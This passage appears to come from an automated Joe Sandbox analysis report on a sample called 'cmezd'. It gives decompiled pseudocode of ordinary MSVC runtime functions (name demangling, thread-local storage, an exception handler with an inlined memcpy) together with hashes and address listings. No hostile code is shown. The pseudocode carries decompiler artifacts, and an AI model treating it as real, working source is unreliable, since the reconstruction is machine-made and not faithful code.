                                                                                              • DName::operator+.LIBCMT ref: 01361644
                                                                                                • Part of subcall function 0135BD24: DName::operator=.LIBVCRUNTIME ref: 0135BD45
                                                                                              • DName::DName.LIBVCRUNTIME ref: 013616AB
                                                                                              • DName::operator+.LIBCMT ref: 013616B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                                                              • String ID:
                                                                                              • API String ID: 2795783184-0
                                                                                              • Opcode ID: 3a2ce640640785eaa0bcdded62e5168bb489b4f94435309ca8566122e4c62c3d
                                                                                              • Instruction ID: d0d984f3d13d246adda9426018c38d3720199c05e1cf24d9cb3faa27aef1ebda
                                                                                              • Opcode Fuzzy Hash: 3a2ce640640785eaa0bcdded62e5168bb489b4f94435309ca8566122e4c62c3d
                                                                                              • Instruction Fuzzy Hash: 21410BB4A002489FDB24DF6CC490FAEFFFDAB49718F444458E58697298D7359D40C754
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135D0ED Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0135D0ED(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				void* __edi;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E0135C1FB(__edx, 0,  &_v12, 1, 0);
				_t40 =  *_t25;
				_t58 = _t40;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x13a0b18; // 0x0
				if(_t26 == 0) {
					_t39 =  *_t27;
					if(_t39 != 0 && _t39 != 0x40) {
						_v12 = "::";
						_v8 = 2;
						_t37 = E0135BB4B(E0135BB29(E0135CD2F(_t58,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
						_t58 =  *_t37;
						 *_t60 = _t58;
						 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t27 =  *0x13a0b18; // 0x0
					}
				}
				_t41 =  *_t27;
				if(_t41 != 0x40) {
					if(_t41 == 0) {
						_push(1);
						if(_t58 != 0) {
							_v12 = "::";
							_v8 = 2;
							_t30 = E0135BB4B(E0135BB29(E0135B826( &_v36),  &_v28,  &_v12),  &_v20, _t60);
							 *_t60 =  *_t30;
							 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							E0135BDFB(_t60);
						}
					} else {
						 *((intOrPtr*)(_t60 + 4)) = 0;
						 *((char*)(_t60 + 4)) = 2;
						 *_t60 = 0;
					}
				} else {
					 *0x13a0b18 = _t27 + 1;
				}
				return _t60;
			}



















                                                                                              0x0135d0f8
                                                                                              0x0135d102
                                                                                              0x0135d104
                                                                                              0x0135d107
                                                                                              0x0135d10f
                                                                                              0x0135d111
                                                                                              0x0135d113
                                                                                              0x0135d115
                                                                                              0x0135d11a
                                                                                              0x0135d11d
                                                                                              0x0135d122
                                                                                              0x0135d124
                                                                                              0x0135d128
                                                                                              0x0135d132
                                                                                              0x0135d13a
                                                                                              0x0135d15d
                                                                                              0x0135d162
                                                                                              0x0135d164
                                                                                              0x0135d169
                                                                                              0x0135d16c
                                                                                              0x0135d16c
                                                                                              0x0135d128
                                                                                              0x0135d171
                                                                                              0x0135d176
                                                                                              0x0135d182
                                                                                              0x0135d18f
                                                                                              0x0135d193
                                                                                              0x0135d1a1
                                                                                              0x0135d1a8
                                                                                              0x0135d1ca
                                                                                              0x0135d1d1
                                                                                              0x0135d1d6
                                                                                              0x0135d195
                                                                                              0x0135d197
                                                                                              0x0135d197
                                                                                              0x0135d184
                                                                                              0x0135d184
                                                                                              0x0135d187
                                                                                              0x0135d18b
                                                                                              0x0135d18b
                                                                                              0x0135d178
                                                                                              0x0135d179
                                                                                              0x0135d179
                                                                                              0x0135d1df

                                                                                              APIs
                                                                                                • Part of subcall function 0135C1FB: Replicator::operator[].LIBCMT ref: 0135C238
                                                                                              • DName::operator=.LIBVCRUNTIME ref: 0135D197
                                                                                                • Part of subcall function 0135CD2F: DName::operator+.LIBCMT ref: 0135CD9A
                                                                                                • Part of subcall function 0135CD2F: DName::operator+.LIBCMT ref: 0135D064
                                                                                              • DName::operator+.LIBCMT ref: 0135D151
                                                                                              • DName::operator+.LIBCMT ref: 0135D15D
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135D1AF
                                                                                              • DName::operator+.LIBCMT ref: 0135D1BE
                                                                                              • DName::operator+.LIBCMT ref: 0135D1CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                              • String ID:
                                                                                              • API String ID: 955152517-0
                                                                                              • Opcode ID: a105cdcaeb0cf39f6310830c040da15b81b20fc2e640154beabc9bc011d01320
                                                                                              • Instruction ID: f7421963ed9a9f8fd6c49d1c8e340697ab6bc5a15a9912c9bae2c3873b8a9da9
                                                                                              • Opcode Fuzzy Hash: a105cdcaeb0cf39f6310830c040da15b81b20fc2e640154beabc9bc011d01320
                                                                                              • Instruction Fuzzy Hash: D531A1B5A002099FCBA8DF98C450EEAFBF9BF69B08F00445DE98B97354D7309644CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135B17C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0135B17C(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x139e228 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0138240C(_t13,  *0x139e228);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E01382447(_t14,  *0x139e228, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0138238B();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E01382447(_t18,  *0x139e228, 0);
								} else {
									_t8 = E01382447(_t18,  *0x139e228, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0135B2EA(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                                                              0x0135b17c
                                                                                              0x0135b183
                                                                                              0x0135b196
                                                                                              0x0135b19d
                                                                                              0x0135b19f
                                                                                              0x0135b1a3
                                                                                              0x0135b1bc
                                                                                              0x0135b1bc
                                                                                              0x0135b1a5
                                                                                              0x0135b1a7
                                                                                              0x0135b1ba
                                                                                              0x0135b1c1
                                                                                              0x0135b1ca
                                                                                              0x0135b1cd
                                                                                              0x0135b1d0
                                                                                              0x0135b1e4
                                                                                              0x0135b1e4
                                                                                              0x0135b1ed
                                                                                              0x0135b1d2
                                                                                              0x0135b1d9
                                                                                              0x0135b1df
                                                                                              0x0135b1e2
                                                                                              0x0135b1f6
                                                                                              0x0135b1f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135b1e2
                                                                                              0x0135b1fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135b1ba
                                                                                              0x0135b1a7
                                                                                              0x0135b203
                                                                                              0x0135b20d
                                                                                              0x0135b185
                                                                                              0x0135b187
                                                                                              0x0135b187

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,0135B173,013542AF,013539DE), ref: 0135B18A
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0135B198
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0135B1B1
                                                                                              • SetLastError.KERNEL32(00000000,0135B173,013542AF,013539DE), ref: 0135B203
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 1901094f1bff39f7fca6f5bb551ad8550432cb6d989a3be0d2a89626e9e4ea38
                                                                                              • Instruction ID: 708a43d23a30a24865430812bd7c641c297172bcd0febdc0525c4afbd9708033
                                                                                              • Opcode Fuzzy Hash: 1901094f1bff39f7fca6f5bb551ad8550432cb6d989a3be0d2a89626e9e4ea38
                                                                                              • Instruction Fuzzy Hash: 4801D8322093167EF7A936BD7C85D2B7A6DDB05B7CB20033AED20551E9EF1259428760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01354650 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 45%
                                                                                              			E01354650(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E0139353B(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0x139e210;
				E01354610(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x139e210);
				E01362547(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E01362530(_t196, 0xfffffffe, _t258, 0x139e210);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E013624D0(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E01354610(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0x1394218;
											if(__eflags != 0) {
												_t191 = L013622F0(__eflags, 0x1394218);
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0x1394218; // 0x135412d
													 *0x13a2000(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E01362510(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E01362530(_t162, _t241, _t258, 0x139e210);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
										E01354610(_t196, _t222, _t241, _t258, _v12);
										E013624F0();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0x139fe24], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0x139fe24], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t57 = _t260 + 4; // 0x438b0a74
																			_t260 = _t57;
																			 *_t243 = _t176;
																			_t243 = _t243 + 4;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t59 = _t260 + 8; // 0xa3008b14
																			_t260 = _t59;
																			asm("movq [edi], xmm1");
																			_t243 = _t243 + 8;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t67 = _t260 - 8; // 0xe850fc45
																			_t263 = _t67;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t71 = _t260 - 4; // 0x2c5
																				_t264 = _t71;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t243 = _t243 + 0x30;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t63 = _t260 - 0xc; // 0x8d50ec45
																			_t265 = _t63;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t265 + 0xc;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0x139e218], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t143 = _t260 + 4; // 0x14438b0a
																		_t260 = _t143;
																		_t243 = _t243 + 4;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t138 = _t260 + 0x80; // 0x8740139
																	_t260 = _t138;
																	_t243 = _t243 + 0x80;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0x139e218], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t140 = _t260 + 0x20; // 0x8bc35be3
																	_t260 = _t140;
																	_t243 = _t243 + 0x20;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M01354A14))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	_t95 = __esi + 1; // 0x74000c7b
																	 *((char*)(__edi + 1)) =  *_t95;
																	_t97 = __esi + 2; // 0xa74000c
																	 *((char*)(__edi + 2)) =  *_t97;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0x139e218], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																_t104 = _t267 - 1; // 0xc7b8000
																 *(_t251 - 1) =  *_t104;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M01354AC0))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x36ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	_t118 = __esi + 3; // 0x8b0a7400
																	 *((char*)(__edi + 3)) =  *_t118;
																	_t120 = __esi + 2; // 0xa74000c
																	 *((char*)(__edi + 2)) =  *_t120;
																	_t122 = __esi + 1; // 0x74000c7b
																	 *((char*)(__edi + 1)) =  *_t122;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}
























































                                                                                              0x01354650
                                                                                              0x01354657
                                                                                              0x0135465b
                                                                                              0x0135465c
                                                                                              0x01354662
                                                                                              0x0135466e
                                                                                              0x01354670
                                                                                              0x01354676
                                                                                              0x01354676
                                                                                              0x0135467f
                                                                                              0x01354681
                                                                                              0x01354684
                                                                                              0x01354687
                                                                                              0x0135468f
                                                                                              0x01354694
                                                                                              0x01354697
